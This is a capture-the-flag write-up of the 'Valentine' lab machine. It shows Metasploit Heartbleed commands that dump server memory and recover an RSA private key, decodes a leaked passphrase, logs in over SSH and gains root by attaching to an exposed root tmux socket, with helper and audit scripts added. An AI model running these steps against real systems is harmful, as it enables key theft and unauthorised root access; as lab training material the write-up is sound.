Valentine


h3xu

# Enumeration

### NMAP

```
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2021-05-13T09:00:42+00:00; +3m55s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 3m54s
```

### Web Application

Dirbuster (screenshot omitted) turns up a `/dev/` directory; `/dev/notes` contains the following to-do list:

```
To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.
```

Both port 80 and 443 have the same functionality. The first thing we see is a woman and a bleeding heart. Weirdly enough there is an OpenSSL vulnerability called *[heartbleed](https://heartbleed.com)*.

# Exploit w/ Metasploit

I am running an auxiliary module to check if the vulnerability exists for this machine. Then I am going to exploit the vulnerability by dumping the information from the memory of the server.

```
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

[+] 10.10.10.79:443       - Heartbeat response with leak, 65535 bytes
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[+] 10.10.10.79:443       - Heartbeat response with leak, 65535 bytes
[+] 10.10.10.79:443       - Heartbeat data stored in /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

I am going to use *strings* to check the contents of the binary loot file the Heartbleed module produced. The output reveals a base64 text string.

```
$ sudo strings /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin
[sudo] password for kali: 
0&J/
u8DF
ux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Referer: https://127.0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
.Dl[
/m:t w
wHXpq
N[xckM
t]Sd
fwF)u`
1MC&
P0N0
["lr
["lr
'760{pu
.Dl[
/m:t w
wHXpq
N[xckM
```

The decoded version of the text value is ***heartbleedbelievethehype*** and I guess it is a passphrase.

```
$ printf "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype
```
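Triaging a Heartbleed loot file by hand means eyeballing `strings` output for anything that looks like a submitted form field. The following is an added example (not from the original post) that does the same programmatically over a constructed dump: it extracts printable runs the way `strings` does, pulls out key=value form fields and base64-decodes the ones that are well-formed base64 of printable text. `SAMPLE_DUMP` is constructed, not the real loot.

```python
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed stand-in for the loot file: fragments of another client's HTTP
# POST left in the server's memory. Not bytes from the real box.
SAMPLE_DUMP = (
    b"\x16\x03\x01\x7f\xa9"
    b"ux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
    b"Referer: https://127.0.0.1/decode.php\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 42\r\n\r\n"
    b"$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==\x00\x11.Dl[\xff"
)

# key=value pairs as they appear in a URL-encoded form body.
_PARAM = re.compile(rb"([A-Za-z_][A-Za-z0-9_]*)=([A-Za-z0-9+/=%._-]+)")


def printable_strings(dump: bytes, min_len: int = 4) -> List[str]:
    """Same idea as `strings`: runs of at least min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group(0).decode("ascii") for m in re.finditer(pattern, dump)]


def form_params(dump: bytes) -> Dict[str, str]:
    """Collect anything that looks like a submitted form field from the dump."""
    params = {}
    for s in printable_strings(dump):
        for key, value in _PARAM.findall(s.encode("ascii")):
            # form bodies percent-encode '+' and '=', so undo that first
            params[key.decode()] = unquote_plus(value.decode())
    return params


def try_base64(value: str) -> Optional[str]:
    """Decode value if it is well-formed base64 of printable text, else None."""
    if len(value) < 8 or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # bad alphabet, bad padding or non-ASCII payload
        return None
    text = text.rstrip("\r\n")
    return text if text.isprintable() else None


def leaked_form_values(dump: bytes) -> Dict[str, str]:
    """Form fields from the dump, with base64 values decoded where possible."""
    return {k: try_base64(v) or v for k, v in form_params(dump).items()}
```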

The next thing I want to do is look at the other actions this module offers.

```
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   DUMP  Dump memory contents to loot
   KEYS  Recover private keys from memory
   SCAN  Check hosts for vulnerability


msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 10.10.10.79:443       - Scanning for private keys
[*] 10.10.10.79:443       - Getting public key constants...
[*] 10.10.10.79:443       - 2021-05-13 11:42:28 UTC - Starting.
[*] 10.10.10.79:443       - 2021-05-13 11:42:28 UTC - Attempt 0...
[+] 10.10.10.79:443       - 2021-05-13 11:42:30 UTC - Got the private key
[*] 10.10.10.79:443       - -----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

[*] 10.10.10.79:443       - Private key stored in /root/.msf4/loot/20210513074230_default_10.10.10.79_openssl.heartble_001596.txt
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Now that I had a passphrase and a private key, I tried to log in with usernames such as admin, bleed, heart, heartbleed, bleedheart, valentine and others. In the end I had to go back over my enumeration to see where I had gone wrong, and figured out that I had missed something. In the /dev/ directory there is a second file called *hype_key*, which not only contains a private key as a HEX value but also tells me that the owner of the private key is ***hype***. I ran the hex value through a hex-to-text converter and received a second private key. All that was left was to copy the private key to a file, change its permissions to 600 and SSH to the box with the previously found passphrase.

```
# ssh -i web_key [email protected]
Enter passphrase for key 'web_key': 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ 
```
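To make the key-handling step reproducible, here is an added example (not the author's code) that converts a hex dump into PEM, reads the PEM headers to tell whether the key is passphrase-protected (which is why `ssh` prompted for one above), and creates the key file with mode 0600 from the start instead of chmod-ing it afterwards. `FAKE_PEM` and `SAMPLE_HEX` are constructed stand-ins, not the real contents of hype_key.

```python
import os
import re
import stat
import tempfile
from typing import Dict

# Constructed stand-in for the hex blob in /dev/hype_key: it encodes a short
# fake PEM with an encryption header, not a real key.
FAKE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=\n"
    "-----END RSA PRIVATE KEY-----\n"
)
SAMPLE_HEX = FAKE_PEM.encode("ascii").hex()


def hex_to_pem(blob: str) -> str:
    """Decode a hex dump of a key file, ignoring whitespace between bytes."""
    cleaned = re.sub(r"\s+", "", blob)
    if len(cleaned) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", cleaned):
        raise ValueError("not an even-length hex string")
    return bytes.fromhex(cleaned).decode("ascii")


def pem_info(pem: str) -> Dict[str, object]:
    """Label and encryption headers of a PEM block (encrypted => ssh asks for a passphrase)."""
    lines = pem.strip().splitlines()
    if not (lines[0].startswith("-----BEGIN ") and lines[-1].startswith("-----END ")):
        raise ValueError("not a PEM block")
    headers = dict(l.split(": ", 1) for l in lines[1:-1] if ": " in l)
    return {
        "label": lines[0][len("-----BEGIN "):-len("-----")],
        "encrypted": headers.get("Proc-Type", "").endswith("ENCRYPTED"),
        "cipher": headers.get("DEK-Info", "").split(",")[0] or None,
    }


def write_private_key(pem: str, path: str) -> int:
    """Create the key file with mode 0600 from the start (O_EXCL: never clobber)."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(pem)
    return stat.S_IMODE(os.stat(path).st_mode)


def write_key_to_tempdir(pem: str, name: str = "web_key") -> int:
    """Helper for a self-contained run: returns the mode bits of the new file."""
    return write_private_key(pem, os.path.join(tempfile.mkdtemp(), name))
```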

There are many ways to achieve root on the machine. The output from *linuxprivchecker.py* revealed SUID files of interest, processes such as a root-owned tmux running with the *dev_sess* socket, and the DirtyCow kernel exploit, among others. I chose the tmux one to save some time.

```
hype@Valentine:~/Desktop$ ps aux
...snip...
root       1020  0.0  0.1  26416  1672 ?        Ss   01:59   0:05 /usr/bin/tmux -S /.devs/dev_sess
...snip...

hype@Valentine:~/Desktop$ tmux -S /.devs/dev_sess
root@Valentine:/home/hype/Desktop# whoami
root
```

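From the defender's side, the `dev_sess` finding is a root-owned tmux server socket that an unprivileged user could connect to; anyone who can write to a UNIX socket file can attach to the server behind it. The following is an added example (not part of the writeup) that audits a directory tree for root-owned sockets with group/other write bits and reproduces the misconfiguration in a temp dir; `exposed_sockets` and `demo` are names assumed here.

```python
import os
import socket
import stat
import tempfile
from typing import List, Tuple


def exposed_sockets(root: str, owner_uid: int = 0) -> List[Tuple[str, str]]:
    """UNIX sockets under root owned by owner_uid that other users can write to.

    connect() on a UNIX socket needs write permission on the socket file, so a
    root-owned tmux server socket with group/other write bits hands its root
    session to every such user. Returns (path, octal mode) pairs.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # vanished or unreadable; skip rather than abort
                continue
            if not stat.S_ISSOCK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if st.st_uid == owner_uid and mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, oct(mode)))
    return findings


def demo() -> List[Tuple[str, str]]:
    """Constructed scenario mirroring /.devs/dev_sess: one socket left world-writable
    next to one locked to its owner. Uses the current uid as 'owner' so it runs
    unprivileged; on a real host run exposed_sockets("/") as root with owner_uid=0."""
    base = tempfile.mkdtemp()
    sock_dir = os.path.join(base, ".devs")
    os.mkdir(sock_dir)
    servers = []
    for name, mode in (("dev_sess", 0o777), ("private", 0o700)):
        path = os.path.join(sock_dir, name)
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        srv.bind(path)  # bind() creates the socket inode on disk
        os.chmod(path, mode)
        servers.append(srv)
    try:
        return exposed_sockets(base, owner_uid=os.getuid())
    finally:
        for srv in servers:
            srv.close()
```

Only `dev_sess` is reported; the 0700 socket beside it is the configuration a root-owned tmux server should have.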
